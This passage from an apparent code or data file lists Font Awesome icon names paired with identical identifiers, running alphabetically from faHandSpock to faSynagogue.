pock","faHandSpock"),("faHands","faHands"),("faHandsHeart","faHandsHeart"),("faHandsHelping","faHandsHelping"),("faH
andsUsd","faHandsUsd"),("faHandsWash","faHandsWash"),("faHandshake","faHandshake"),("faHandshakeAlt","faHandshakeAlt"),("faHandshakeAltSlash","faHandshakeAltSlash"),("faHandshakeSlash","faHandshakeSlash"),("faHanukiah","faHanukiah"),("faHardHat","faHardHat"),("faHashtag","faHashtag"),("faHatChef","faHatChef"),("faHatCowboy","faHatCowboy"),("faHatCowboySide","faHatCowboySide"),("faHatSanta","faHatSanta"),("faHatWinter","faHatWinter"),("faHatWitch","faHatWitch"),("faHatWizard","faHatWizard"),("faHdd","faHdd"),("faHeadSide","faHeadSide"),("faHeadSideBrain","faHeadSideBrain"),("faHeadSideCough","faHeadSideCough"),("faHeadSideCoughSlash","faHeadSideCoughSlash"),("faHeadSideHeadphones","faHeadSideHeadphones"),("faHeadSideMask","faHeadSideMask"),("faHeadSideMedical","faHeadSideMedical"),("faHeadSideVirus","faHeadSideVirus"),("faHeadVr","faHeadVr"),("faHeading","faHeading"),("faHeadphones","faHeadphones"),("faHeadphonesAlt","faHeadphonesAlt"),("faHeadset","faHeadset"),("faHeart","faHeart"),("faHeartBroken","faHeartBroken"),("faHeartCircle","faHeartCircle"),("faHeartRate","faHeartRate"),("faHeartSquare","faHeartSquare"),("faHeartbeat","faHeartbeat"),("faHeat","faHeat"),("faHelicopter","faHelicopter"),("faHelmetBattle","faHelmetBattle"),("faHexagon","faHexagon"),("faHighlighter","faHighlighter"),("faHiking","faHiking"),("faHippo","faHippo"),("faHips","faHips"),("faHireAHelper","faHireAHelper"),("faHistory","faHistory"),("faHive","faHive"),("faHockeyMask","faHockeyMask"),("faHockeyPuck","faHockeyPuck"),("faHockeySticks","faHockeySticks"),("faHollyBerry","faHollyBerry"),("faHome","faHome"),("faHomeAlt","faHomeAlt"),("faHomeHeart","faHomeHeart"),("faHomeLg","faHomeLg"),("faHomeLgAlt","faHomeLgAlt"),("faHoodCloak","faHoodCloak"),("faHooli","faHooli"),("faHorizontalRule","faHorizontalRule"),("faHornbill","faHornbill"),("faHorse","faHorse"),("faHorseHead","faHorseHead"),("faHorseSaddle","faHorseSaddle"),("faHospital","faHospital"),("faHospitalAlt","faHospitalAlt"),("faHospitalSymbo
l","faHospitalSymbol"),("faHospitalUser","faHospitalUser"),("faHospitals","faHospitals"),("faHotTub","faHotTub"),("faHotdog","faHotdog"),("faHotel","faHotel"),("faHotjar","faHotjar"),("faHourglass","faHourglass"),("faHourglassEnd","faHourglassEnd"),("faHourglassHalf","faHourglassHalf"),("faHourglassStart","faHourglassStart"),("faHouse","faHouse"),("faHouseDamage","faHouseDamage"),("faHouseDay","faHouseDay"),("faHouseFlood","faHouseFlood"),("faHouseLeave","faHouseLeave"),("faHouseNight","faHouseNight"),("faHouseReturn","faHouseReturn"),("faHouseSignal","faHouseSignal"),("faHouseUser","faHouseUser"),("faHouzz","faHouzz"),("faHryvnia","faHryvnia"),("faHtml5","faHtml5"),("faHubspot","faHubspot"),("faHumidity","faHumidity"),("faHurricane","faHurricane"),("faICursor","faICursor"),("faIceCream","faIceCream"),("faIceSkate","faIceSkate"),("faIcicles","faIcicles"),("faIcons","faIcons"),("faIconsAlt","faIconsAlt"),("faIdBadge","faIdBadge"),("faIdCard","faIdCard"),("faIdCardAlt","faIdCardAlt"),("faIdeal","faIdeal"),("faIgloo","faIgloo"),("faImage","faImage"),("faImagePolaroid","faImagePolaroid"),("faImages","faImages"),("faImdb","faImdb"),("faInbox","faInbox"),("faInboxIn","faInboxIn"),("faInboxOut","faInboxOut"),("faIndent","faIndent"),("faIndustry","faIndustry"),("faIndustryAlt","faIndustryAlt"),("faInfinity","faInfinity"),("faInfo","faInfo"),("faInfoCircle","faInfoCircle"),("faInfoSquare","faInfoSquare"),("faInhaler","faInhaler"),("faInnosoft","faInnosoft"),("faInstagram","faInstagram"),("faInstagramSquare","faInstagramSquare"),("faInstalod","faInstalod"),("faIntegral","faIntegral"),("faIntercom","faIntercom"),("faInternetExplorer","faInternetExplorer"),("faIntersection","faIntersection"),("faInventory","faInventory"),("faInvision","faInvision"),("faIoxhost","faIoxhost"),("faIslandTropical","faIslandTropical"),("faItalic","faItalic"),("faItchIo","faItchIo"),("faItunes","faItunes"),("faItunesNote","faItunesNote"),("faJackOLantern","faJackOLantern"),("faJava","faJava"),("faJed
i","faJedi"),("faJediOrder","faJediOrder"),("faJenkins","faJenkins"),("faJira","faJira"),("faJoget","faJoget"),("faJoint","faJoint"),("faJoomla","faJoomla"),("faJournalWhills","faJournalWhills"),("faJoystick","faJoystick"),("faJs","faJs"),("faJsSquare","faJsSquare"),("faJsfiddle","faJsfiddle"),("faJug","faJug"),("faKaaba","faKaaba"),("faKaggle","faKaggle"),("faKazoo","faKazoo"),("faKerning","faKerning"),("faKey","faKey"),("faKeySkeleton","faKeySkeleton"),("faKeybase","faKeybase"),("faKeyboard","faKeyboard"),("faKeycdn","faKeycdn"),("faKeynote","faKeynote"),("faKhanda","faKhanda"),("faKickstarter","faKickstarter"),("faKickstarterK","faKickstarterK"),("faKidneys","faKidneys"),("faKiss","faKiss"),("faKissBeam","faKissBeam"),("faKissWinkHeart","faKissWinkHeart"),("faKite","faKite"),("faKiwiBird","faKiwiBird"),("faKnifeKitchen","faKnifeKitchen"),("faKorvue","faKorvue"),("faLambda","faLambda"),("faLamp","faLamp"),("faLampDesk","faLampDesk"),("faLampFloor","faLampFloor"),("faLandmark","faLandmark"),("faLandmarkAlt","faLandmarkAlt"),("faLanguage","faLanguage"),("faLaptop","faLaptop"),("faLaptopCode","faLaptopCode"),("faLaptopHouse","faLaptopHouse"),("faLaptopMedical","faLaptopMedical"),("faLaravel","faLaravel"),("faLasso","faLasso"),("faLastfm","faLastfm"),("faLastfmSquare","faLastfmSquare"),("faLaugh","faLaugh"),("faLaughBeam","faLaughBeam"),("faLaughSquint","faLaughSquint"),("faLaughWink","faLaughWink"),("faLayerGroup","faLayerGroup"),("faLayerMinus","faLayerMinus"),("faLayerPlus","faLayerPlus"),("faLeaf","faLeaf"),("faLeafHeart","faLeafHeart"),("faLeafMaple","faLeafMaple"),("faLeafOak","faLeafOak"),("faLeanpub","faLeanpub"),("faLemon","faLemon"),("faLess","faLess"),("faLessThan","faLessThan"),("faLessThanEqual","faLessThanEqual"),("faLevelDown","faLevelDown"),("faLevelDownAlt","faLevelDownAlt"),("faLevelUp","faLevelUp"),("faLevelUpAlt","faLevelUpAlt"),("faLifeRing","faLifeRing"),("faLightCeiling","faLightCeiling"),("faLightSwitch","faLightSwitch"),("faLightSwitchOff","fa
LightSwitchOff"),("faLightSwitchOn","faLightSwitchOn"),("faLightbulb","faLightbulb"),("faLightbulbDollar","faLightbulbDollar"),("faLightbulbExclamation","faLightbulbExclamation"),("faLightbulbOn","faLightbulbOn"),("faLightbulbSlash","faLightbulbSlash"),("faLightsHoliday","faLightsHoliday"),("faLine","faLine"),("faLineColumns","faLineColumns"),("faLineHeight","faLineHeight"),("faLink","faLink"),("faLinkedin","faLinkedin"),("faLinkedinIn","faLinkedinIn"),("faLinode","faLinode"),("faLinux","faLinux"),("faLips","faLips"),("faLiraSign","faLiraSign"),("faList","faList"),("faListAlt","faListAlt"),("faListMusic","faListMusic"),("faListOl","faListOl"),("faListUl","faListUl"),("faLocation","faLocation"),("faLocationArrow","faLocationArrow"),("faLocationCircle","faLocationCircle"),("faLocationSlash","faLocationSlash"),("faLock","faLock"),("faLockAlt","faLockAlt"),("faLockOpen","faLockOpen"),("faLockOpenAlt","faLockOpenAlt"),("faLongArrowAltDown","faLongArrowAltDown"),("faLongArrowAltLeft","faLongArrowAltLeft"),("faLongArrowAltRight","faLongArrowAltRight"),("faLongArrowAltUp","faLongArrowAltUp"),("faLongArrowDown","faLongArrowDown"),("faLongArrowLeft","faLongArrowLeft"),("faLongArrowRight","faLongArrowRight"),("faLongArrowUp","faLongArrowUp"),("faLoveseat","faLoveseat"),("faLowVision","faLowVision"),("faLuchador","faLuchador"),("faLuggageCart","faLuggageCart"),("faLungs","faLungs"),("faLungsVirus","faLungsVirus"),("faLyft","faLyft"),("faMace","faMace"),("faMagento","faMagento"),("faMagic","faMagic"),("faMagnet","faMagnet"),("faMailBulk","faMailBulk"),("faMailbox","faMailbox"),("faMailchimp","faMailchimp"),("faMale","faMale"),("faMandalorian","faMandalorian"),("faMandolin","faMandolin"),("faMap","faMap"),("faMapMarked","faMapMarked"),("faMapMarkedAlt","faMapMarkedAlt"),("faMapMarker","faMapMarker"),("faMapMarkerAlt","faMapMarkerAlt"),("faMapMarkerAltSlash","faMapMarkerAltSlash"),("faMapMarkerCheck","faMapMarkerCheck"),("faMapMarkerEdit","faMapMarkerEdit"),("faMapMarkerExclamatio
n","faMapMarkerExclamation"),("faMapMarkerMinus","faMapMarkerMinus"),("faMapMarkerPlus","faMapMarkerPlus"),("faMapMarkerQuestion","faMapMarkerQuestion"),("faMapMarkerSlash","faMapMarkerSlash"),("faMapMarkerSmile","faMapMarkerSmile"),("faMapMarkerTimes","faMapMarkerTimes"),("faMapPin","faMapPin"),("faMapSigns","faMapSigns"),("faMarkdown","faMarkdown"),("faMarker","faMarker"),("faMars","faMars"),("faMarsDouble","faMarsDouble"),("faMarsStroke","faMarsStroke"),("faMarsStrokeH","faMarsStrokeH"),("faMarsStrokeV","faMarsStrokeV"),("faMask","faMask"),("faMastodon","faMastodon"),("faMaxcdn","faMaxcdn"),("faMdb","faMdb"),("faMeat","faMeat"),("faMedal","faMedal"),("faMedapps","faMedapps"),("faMedium","faMedium"),("faMediumM","faMediumM"),("faMedkit","faMedkit"),("faMedrt","faMedrt"),("faMeetup","faMeetup"),("faMegaphone","faMegaphone"),("faMegaport","faMegaport"),("faMeh","faMeh"),("faMehBlank","faMehBlank"),("faMehRollingEyes","faMehRollingEyes"),("faMemory","faMemory"),("faMendeley","faMendeley"),("faMenorah","faMenorah"),("faMercury","faMercury"),("faMeteor","faMeteor"),("faMicroblog","faMicroblog"),("faMicrochip","faMicrochip"),("faMicrophone","faMicrophone"),("faMicrophoneAlt","faMicrophoneAlt"),("faMicrophoneAltSlash","faMicrophoneAltSlash"),("faMicrophoneSlash","faMicrophoneSlash"),("faMicrophoneStand","faMicrophoneStand"),("faMicroscope","faMicroscope"),("faMicrosoft","faMicrosoft"),("faMicrowave","faMicrowave"),("faMindShare","faMindShare"),("faMinus","faMinus"),("faMinusCircle","faMinusCircle"),("faMinusHexagon","faMinusHexagon"),("faMinusOctagon","faMinusOctagon"),("faMinusSquare","faMinusSquare"),("faMistletoe","faMistletoe"),("faMitten","faMitten"),("faMix","faMix"),("faMixcloud","faMixcloud"),("faMixer","faMixer"),("faMizuni","faMizuni"),("faMobile","faMobile"),("faMobileAlt","faMobileAlt"),("faMobileAndroid","faMobileAndroid"),("faMobileAndroidAlt","faMobileAndroidAlt"),("faModx","faModx"),("faMonero","faMonero"),("faMoneyBill","faMoneyBill"),("faMoneyBillAlt","
faMoneyBillAlt"),("faMoneyBillWave","faMoneyBillWave"),("faMoneyBillWaveAlt","faMoneyBillWaveAlt"),("faMoneyCheck","faMoneyCheck"),("faMoneyCheckAlt","faMoneyCheckAlt"),("faMoneyCheckEdit","faMoneyCheckEdit"),("faMoneyCheckEditAlt","faMoneyCheckEditAlt"),("faMonitorHeartRate","faMonitorHeartRate"),("faMonkey","faMonkey"),("faMonument","faMonument"),("faMoon","faMoon"),("faMoonCloud","faMoonCloud"),("faMoonStars","faMoonStars"),("faMortarPestle","faMortarPestle"),("faMosque","faMosque"),("faMotorcycle","faMotorcycle"),("faMountain","faMountain"),("faMountains","faMountains"),("faMouse","faMouse"),("faMouseAlt","faMouseAlt"),("faMousePointer","faMousePointer"),("faMp3Player","faMp3Player"),("faMug","faMug"),("faMugHot","faMugHot"),("faMugMarshmallows","faMugMarshmallows"),("faMugTea","faMugTea"),("faMusic","faMusic"),("faMusicAlt","faMusicAlt"),("faMusicAltSlash","faMusicAltSlash"),("faMusicSlash","faMusicSlash"),("faNapster","faNapster"),("faNarwhal","faNarwhal"),("faNeos","faNeos"),("faNetworkWired","faNetworkWired"),("faNeuter","faNeuter"),("faNewspaper","faNewspaper"),("faNimblr","faNimblr"),("faNode","faNode"),("faNodeJs","faNodeJs"),("faNotEqual","faNotEqual"),("faNotesMedical","faNotesMedical"),("faNpm","faNpm"),("faNs8","faNs8"),("faNutritionix","faNutritionix"),("faObjectGroup","faObjectGroup"),("faObjectUngroup","faObjectUngroup"),("faOctagon","faOctagon"),("faOctopusDeploy","faOctopusDeploy"),("faOdnoklassniki","faOdnoklassniki"),("faOdnoklassnikiSquare","faOdnoklassnikiSquare"),("faOilCan","faOilCan"),("faOilTemp","faOilTemp"),("faOldRepublic","faOldRepublic"),("faOm","faOm"),("faOmega","faOmega"),("faOpencart","faOpencart"),("faOpenid","faOpenid"),("faOpera","faOpera"),("faOptinMonster","faOptinMonster"),("faOrcid","faOrcid"),("faOrnament","faOrnament"),("faOsi","faOsi"),("faOtter","faOtter"),("faOutdent","faOutdent"),("faOutlet","faOutlet"),("faOven","faOven"),("faOverline","faOverline"),("faPageBreak","faPageBreak"),("faPage4","faPage4"),("faPagelines",
"faPagelines"),("faPager","faPager"),("faPaintBrush","faPaintBrush"),("faPaintBrushAlt","faPaintBrushAlt"),("faPaintRoller","faPaintRoller"),("faPalette","faPalette"),("faPalfed","faPalfed"),("faPallet","faPallet"),("faPalletAlt","faPalletAlt"),("faPaperPlane","faPaperPlane"),("faPaperclip","faPaperclip"),("faParachuteBox","faParachuteBox"),("faParagraph","faParagraph"),("faParagraphRtl","faParagraphRtl"),("faParking","faParking"),("faParkingCircle","faParkingCircle"),("faParkingCircleSlash","faParkingCircleSlash"),("faParkingSlash","faParkingSlash"),("faPassport","faPassport"),("faPastafarianism","faPastafarianism"),("faPaste","faPaste"),("faPatreon","faPatreon"),("faPause","faPause"),("faPauseCircle","faPauseCircle"),("faPaw","faPaw"),("faPawAlt","faPawAlt"),("faPawClaws","faPawClaws"),("faPaypal","faPaypal"),("faPeace","faPeace"),("faPegasus","faPegasus"),("faPen","faPen"),("faPenAlt","faPenAlt"),("faPenFancy","faPenFancy"),("faPenNib","faPenNib"),("faPenSquare","faPenSquare"),("faPencil","faPencil"),("faPencilAlt","faPencilAlt"),("faPencilPaintbrush","faPencilPaintbrush"),("faPencilRuler","faPencilRuler"),("faPennant","faPennant"),("faPennyArcade","faPennyArcade"),("faPeopleArrows","faPeopleArrows"),("faPeopleCarry","faPeopleCarry"),("faPepperHot","faPepperHot"),("faPerbyte","faPerbyte"),("faPercent","faPercent"),("faPercentage","faPercentage"),("faPeriscope","faPeriscope"),("faPersonBooth","faPersonBooth"),("faPersonCarry","faPersonCarry"),("faPersonDolly","faPersonDolly"),("faPersonDollyEmpty","faPersonDollyEmpty"),("faPersonSign","faPersonSign"),("faPhabricator","faPhabricator"),("faPhoenixFramework","faPhoenixFramework"),("faPhoenixSquadron","faPhoenixSquadron"),("faPhone","faPhone"),("faPhoneAlt","faPhoneAlt"),("faPhoneLaptop","faPhoneLaptop"),("faPhoneOffice","faPhoneOffice"),("faPhonePlus","faPhonePlus"),("faPhoneRotary","faPhoneRotary"),("faPhoneSlash","faPhoneSlash"),("faPhoneSquare","faPhoneSquare"),("faPhoneSquareAlt","faPhoneSquareAlt"),("faPhoneVolu
me","faPhoneVolume"),("faPhotoVideo","faPhotoVideo"),("faPhp","faPhp"),("faPi","faPi"),("faPiano","faPiano"),("faPianoKeyboard","faPianoKeyboard"),("faPie","faPie"),("faPiedPiper","faPiedPiper"),("faPiedPiperAlt","faPiedPiperAlt"),("faPiedPiperHat","faPiedPiperHat"),("faPiedPiperPp","faPiedPiperPp"),("faPiedPiperSquare","faPiedPiperSquare"),("faPig","faPig"),("faPiggyBank","faPiggyBank"),("faPills","faPills"),("faPinterest","faPinterest"),("faPinterestP","faPinterestP"),("faPinterestSquare","faPinterestSquare"),("faPizza","faPizza"),("faPizzaSlice","faPizzaSlice"),("faPlaceOfWorship","faPlaceOfWorship"),("faPlane","faPlane"),("faPlaneAlt","faPlaneAlt"),("faPlaneArrival","faPlaneArrival"),("faPlaneDeparture","faPlaneDeparture"),("faPlaneSlash","faPlaneSlash"),("faPlanetMoon","faPlanetMoon"),("faPlanetRinged","faPlanetRinged"),("faPlay","faPlay"),("faPlayCircle","faPlayCircle"),("faPlaystation","faPlaystation"),("faPlug","faPlug"),("faPlus","faPlus"),("faPlusCircle","faPlusCircle"),("faPlusHexagon","faPlusHexagon"),("faPlusOctagon","faPlusOctagon"),("faPlusSquare","faPlusSquare"),("faPodcast","faPodcast"),("faPodium","faPodium"),("faPodiumStar","faPodiumStar"),("faPoliceBox","faPoliceBox"),("faPoll","faPoll"),("faPollH","faPollH"),("faPollPeople","faPollPeople"),("faPoo","faPoo"),("faPooStorm","faPooStorm"),("faPoop","faPoop"),("faPopcorn","faPopcorn"),("faPortalEnter","faPortalEnter"),("faPortalExit","faPortalExit"),("faPortrait","faPortrait"),("faPoundSign","faPoundSign"),("faPowerOff","faPowerOff"),("faPray","faPray"),("faPrayingHands","faPrayingHands"),("faPrescription","faPrescription"),("faPrescriptionBottle","faPrescriptionBottle"),("faPrescriptionBottleAlt","faPrescriptionBottleAlt"),("faPresentation","faPresentation"),("faPrint","faPrint"),("faPrintSearch","faPrintSearch"),("faPrintSlash","faPrintSlash"),("faProcedures","faProcedures"),("faProductHunt","faProductHunt"),("faProjectDiagram","faProjectDiagram"),("faProjector","faProjector"),("faPumpMedical","faP
umpMedical"),("faPumpSoap","faPumpSoap"),("faPumpkin","faPumpkin"),("faPushed","faPushed"),("faPuzzlePiece","faPuzzlePiece"),("faPython","faPython"),("faQq","faQq"),("faQrcode","faQrcode"),("faQuestion","faQuestion"),("faQuestionCircle","faQuestionCircle"),("faQuestionSquare","faQuestionSquare"),("faQuidditch","faQuidditch"),("faQuinscape","faQuinscape"),("faQuora","faQuora"),("faQuoteLeft","faQuoteLeft"),("faQuoteRight","faQuoteRight"),("faQuran","faQuran"),("faRProject","faRProject"),("faRabbit","faRabbit"),("faRabbitFast","faRabbitFast"),("faRacquet","faRacquet"),("faRadar","faRadar"),("faRadiation","faRadiation"),("faRadiationAlt","faRadiationAlt"),("faRadio","faRadio"),("faRadioAlt","faRadioAlt"),("faRainbow","faRainbow"),("faRaindrops","faRaindrops"),("faRam","faRam"),("faRampLoading","faRampLoading"),("faRandom","faRandom"),("faRaspberryPi","faRaspberryPi"),("faRavelry","faRavelry"),("faRaygun","faRaygun"),("faReact","faReact"),("faReacteurope","faReacteurope"),("faReadme","faReadme"),("faRebel","faRebel"),("faReceipt","faReceipt"),("faRecordVinyl","faRecordVinyl"),("faRectangleLandscape","faRectangleLandscape"),("faRectanglePortrait","faRectanglePortrait"),("faRectangleWide","faRectangleWide"),("faRecycle","faRecycle"),("faRedRiver","faRedRiver"),("faReddit","faReddit"),("faRedditAlien","faRedditAlien"),("faRedditSquare","faRedditSquare"),("faRedhat","faRedhat"),("faRedo","faRedo"),("faRedoAlt","faRedoAlt"),("faRefrigerator","faRefrigerator"),("faRegistered","faRegistered"),("faRemoveFormat","faRemoveFormat"),("faRenren","faRenren"),("faRepeat","faRepeat"),("faRepeat1","faRepeat1"),("faRepeat1Alt","faRepeat1Alt"),("faRepeatAlt","faRepeatAlt"),("faReply","faReply"),("faReplyAll","faReplyAll"),("faReplyd","faReplyd"),("faRepublican","faRepublican"),("faResearchgate","faResearchgate"),("faResolving","faResolving"),("faRestroom","faRestroom"),("faRetweet","faRetweet"),("faRetweetAlt","faRetweetAlt"),("faRev","faRev"),("faRibbon","faRibbon"),("faRing","faRing"),(
"faRingsWedding","faRingsWedding"),("faRoad","faRoad"),("faRobot","faRobot"),("faRocket","faRocket"),("faRocketLaunch","faRocketLaunch"),("faRocketchat","faRocketchat"),("faRockrms","faRockrms"),("faRoute","faRoute"),("faRouteHighway","faRouteHighway"),("faRouteInterstate","faRouteInterstate"),("faRouter","faRouter"),("faRss","faRss"),("faRssSquare","faRssSquare"),("faRubleSign","faRubleSign"),("faRuler","faRuler"),("faRulerCombined","faRulerCombined"),("faRulerHorizontal","faRulerHorizontal"),("faRulerTriangle","faRulerTriangle"),("faRulerVertical","faRulerVertical"),("faRunning","faRunning"),("faRupeeSign","faRupeeSign"),("faRust","faRust"),("faRv","faRv"),("faSack","faSack"),("faSackDollar","faSackDollar"),("faSadCry","faSadCry"),("faSadTear","faSadTear"),("faSafari","faSafari"),("faSalad","faSalad"),("faSalesforce","faSalesforce"),("faSandwich","faSandwich"),("faSass","faSass"),("faSatellite","faSatellite"),("faSatelliteDish","faSatelliteDish"),("faSausage","faSausage"),("faSave","faSave"),("faSaxHot","faSaxHot"),("faSaxophone","faSaxophone"),("faScalpel","faScalpel"),("faScalpelPath","faScalpelPath"),("faScanner","faScanner"),("faScannerImage","faScannerImage"),("faScannerKeyboard","faScannerKeyboard"),("faScannerTouchscreen","faScannerTouchscreen"),("faScarecrow","faScarecrow"),("faScarf","faScarf"),("faSchlix","faSchlix"),("faSchool","faSchool"),("faScrewdriver","faScrewdriver"),("faScribd","faScribd"),("faScroll","faScroll"),("faScrollOld","faScrollOld"),("faScrubber","faScrubber"),("faScythe","faScythe"),("faSdCard","faSdCard"),("faSearch","faSearch"),("faSearchDollar","faSearchDollar"),("faSearchLocation","faSearchLocation"),("faSearchMinus","faSearchMinus"),("faSearchPlus","faSearchPlus"),("faSearchengin","faSearchengin"),("faSeedling","faSeedling"),("faSellcast","faSellcast"),("faSellsy","faSellsy"),("faSendBack","faSendBack"),("faSendBackward","faSendBackward"),("faSensor","faSensor"),("faSensorAlert","faSensorAlert"),("faSensorFire","faSensorFire"),("f
aSensorOn","faSensorOn"),("faSensorSmoke","faSensorSmoke"),("faServer","faServer"),("faServicestack","faServicestack"),("faShapes","faShapes"),("faShare","faShare"),("faShareAll","faShareAll"),("faShareAlt","faShareAlt"),("faShareAltSquare","faShareAltSquare"),("faShareSquare","faShareSquare"),("faSheep","faSheep"),("faShekelSign","faShekelSign"),("faShield","faShield"),("faShieldAlt","faShieldAlt"),("faShieldCheck","faShieldCheck"),("faShieldCross","faShieldCross"),("faShieldVirus","faShieldVirus"),("faShip","faShip"),("faShippingFast","faShippingFast"),("faShippingTimed","faShippingTimed"),("faShirtsinbulk","faShirtsinbulk"),("faShishKebab","faShishKebab"),("faShoePrints","faShoePrints"),("faShopify","faShopify"),("faShoppingBag","faShoppingBag"),("faShoppingBasket","faShoppingBasket"),("faShoppingCart","faShoppingCart"),("faShopware","faShopware"),("faShovel","faShovel"),("faShovelSnow","faShovelSnow"),("faShower","faShower"),("faShredder","faShredder"),("faShuttleVan","faShuttleVan"),("faShuttlecock","faShuttlecock"),("faSickle","faSickle"),("faSigma","faSigma"),("faSign","faSign"),("faSignIn","faSignIn"),("faSignInAlt","faSignInAlt"),("faSignLanguage","faSignLanguage"),("faSignOut","faSignOut"),("faSignOutAlt","faSignOutAlt"),("faSignal","faSignal"),("faSignal1","faSignal1"),("faSignal2","faSignal2"),("faSignal3","faSignal3"),("faSignal4","faSignal4"),("faSignalAlt","faSignalAlt"),("faSignalAlt1","faSignalAlt1"),("faSignalAlt2","faSignalAlt2"),("faSignalAlt3","faSignalAlt3"),("faSignalAltSlash","faSignalAltSlash"),("faSignalSlash","faSignalSlash"),("faSignalStream","faSignalStream"),("faSignature","faSignature"),("faSimCard","faSimCard"),("faSimplybuilt","faSimplybuilt"),("faSink","faSink"),("faSiren","faSiren"),("faSirenOn","faSirenOn"),("faSistrix","faSistrix"),("faSitemap","faSitemap"),("faSith","faSith"),("faSkating","faSkating"),("faSkeleton","faSkeleton"),("faSketch","faSketch"),("faSkiJump","faSkiJump"),("faSkiLift","faSkiLift"),("faSkiing","faSkiing"),(
"faSkiingNordic","faSkiingNordic"),("faSkull","faSkull"),("faSkullCow","faSkullCow"),("faSkullCrossbones","faSkullCrossbones"),("faSkyatlas","faSkyatlas"),("faSkype","faSkype"),("faSlack","faSlack"),("faSlackHash","faSlackHash"),("faSlash","faSlash"),("faSledding","faSledding"),("faSleigh","faSleigh"),("faSlidersH","faSlidersH"),("faSlidersHSquare","faSlidersHSquare"),("faSlidersV","faSlidersV"),("faSlidersVSquare","faSlidersVSquare"),("faSlideshare","faSlideshare"),("faSmile","faSmile"),("faSmileBeam","faSmileBeam"),("faSmilePlus","faSmilePlus"),("faSmileWink","faSmileWink"),("faSmog","faSmog"),("faSmoke","faSmoke"),("faSmoking","faSmoking"),("faSmokingBan","faSmokingBan"),("faSms","faSms"),("faSnake","faSnake"),("faSnapchat","faSnapchat"),("faSnapchatGhost","faSnapchatGhost"),("faSnapchatSquare","faSnapchatSquare"),("faSnooze","faSnooze"),("faSnowBlowing","faSnowBlowing"),("faSnowboarding","faSnowboarding"),("faSnowflake","faSnowflake"),("faSnowflakes","faSnowflakes"),("faSnowman","faSnowman"),("faSnowmobile","faSnowmobile"),("faSnowplow","faSnowplow"),("faSoap","faSoap"),("faSocks","faSocks"),("faSolarPanel","faSolarPanel"),("faSolarSystem","faSolarSystem"),("faSort","faSort"),("faSortAlphaDown","faSortAlphaDown"),("faSortAlphaDownAlt","faSortAlphaDownAlt"),("faSortAlphaUp","faSortAlphaUp"),("faSortAlphaUpAlt","faSortAlphaUpAlt"),("faSortAlt","faSortAlt"),("faSortAmountDown","faSortAmountDown"),("faSortAmountDownAlt","faSortAmountDownAlt"),("faSortAmountUp","faSortAmountUp"),("faSortAmountUpAlt","faSortAmountUpAlt"),("faSortCircle","faSortCircle"),("faSortCircleDown","faSortCircleDown"),("faSortCircleUp","faSortCircleUp"),("faSortDown","faSortDown"),("faSortNumericDown","faSortNumericDown"),("faSortNumericDownAlt","faSortNumericDownAlt"),("faSortNumericUp","faSortNumericUp"),("faSortNumericUpAlt","faSortNumericUpAlt"),("faSortShapesDown","faSortShapesDown"),("faSortShapesDownAlt","faSortShapesDownAlt"),("faSortShapesUp","faSortShapesUp"),("faSortShapesUpAlt","faS
ortShapesUpAlt"),("faSortSizeDown","faSortSizeDown"),("faSortSizeDownAlt","faSortSizeDownAlt"),("faSortSizeUp","faSortSizeUp"),("faSortSizeUpAlt","faSortSizeUpAlt"),("faSortUp","faSortUp"),("faSoundcloud","faSoundcloud"),("faSoup","faSoup"),("faSourcetree","faSourcetree"),("faSpa","faSpa"),("faSpaceShuttle","faSpaceShuttle"),("faSpaceStationMoon","faSpaceStationMoon"),("faSpaceStationMoonAlt","faSpaceStationMoonAlt"),("faSpade","faSpade"),("faSparkles","faSparkles"),("faSpeakap","faSpeakap"),("faSpeaker","faSpeaker"),("faSpeakerDeck","faSpeakerDeck"),("faSpeakers","faSpeakers"),("faSpellCheck","faSpellCheck"),("faSpider","faSpider"),("faSpiderBlackWidow","faSpiderBlackWidow"),("faSpiderWeb","faSpiderWeb"),("faSpinner","faSpinner"),("faSpinnerThird","faSpinnerThird"),("faSplotch","faSplotch"),("faSpotify","faSpotify"),("faSprayCan","faSprayCan"),("faSprinkler","faSprinkler"),("faSquare","faSquare"),("faSquareFull","faSquareFull"),("faSquareRoot","faSquareRoot"),("faSquareRootAlt","faSquareRootAlt"),("faSquarespace","faSquarespace"),("faSquirrel","faSquirrel"),("faStackExchange","faStackExchange"),("faStackOverflow","faStackOverflow"),("faStackpath","faStackpath"),("faStaff","faStaff"),("faStamp","faStamp"),("faStar","faStar"),("faStarAndCrescent","faStarAndCrescent"),("faStarChristmas","faStarChristmas"),("faStarExclamation","faStarExclamation"),("faStarHalf","faStarHalf"),("faStarHalfAlt","faStarHalfAlt"),("faStarOfDavid","faStarOfDavid"),("faStarOfLife","faStarOfLife"),("faStarShooting","faStarShooting"),("faStarfighter","faStarfighter"),("faStarfighterAlt","faStarfighterAlt"),("faStars","faStars"),("faStarship","faStarship"),("faStarshipFreighter","faStarshipFreighter"),("faStaylinked","faStaylinked"),("faSteak","faSteak"),("faSteam","faSteam"),("faSteamSquare","faSteamSquare"),("faSteamSymbol","faSteamSymbol"),("faSteeringWheel","faSteeringWheel"),("faStepBackward","faStepBackward"),("faStepForward","faStepForward"),("faStethoscope","faStethoscope"),("faStickerMu
le","faStickerMule"),("faStickyNote","faStickyNote"),("faStocking","faStocking"),("faStomach","faStomach"),("faStop","faStop"),("faStopCircle","faStopCircle"),("faStopwatch","faStopwatch"),("faStopwatch20","faStopwatch20"),("faStore","faStore"),("faStoreAlt","faStoreAlt"),("faStoreAltSlash","faStoreAltSlash"),("faStoreSlash","faStoreSlash"),("faStrava","faStrava"),("faStream","faStream"),("faStreetView","faStreetView"),("faStretcher","faStretcher"),("faStrikethrough","faStrikethrough"),("faStripe","faStripe"),("faStripeS","faStripeS"),("faStroopwafel","faStroopwafel"),("faStudiovinari","faStudiovinari"),("faStumbleupon","faStumbleupon"),("faStumbleuponCircle","faStumbleuponCircle"),("faSubscript","faSubscript"),("faSubway","faSubway"),("faSuitcase","faSuitcase"),("faSuitcaseRolling","faSuitcaseRolling"),("faSun","faSun"),("faSunCloud","faSunCloud"),("faSunDust","faSunDust"),("faSunHaze","faSunHaze"),("faSunglasses","faSunglasses"),("faSunrise","faSunrise"),("faSunset","faSunset"),("faSuperpowers","faSuperpowers"),("faSuperscript","faSuperscript"),("faSupple","faSupple"),("faSurprise","faSurprise"),("faSuse","faSuse"),("faSwatchbook","faSwatchbook"),("faSwift","faSwift"),("faSwimmer","faSwimmer"),("faSwimmingPool","faSwimmingPool"),("faSword","faSword"),("faSwordLaser","faSwordLaser"),("faSwordLaserAlt","faSwordLaserAlt"),("faSwords","faSwords"),("faSwordsLaser","faSwordsLaser"),("faSymfony","faSymfony"),("faSynagogue",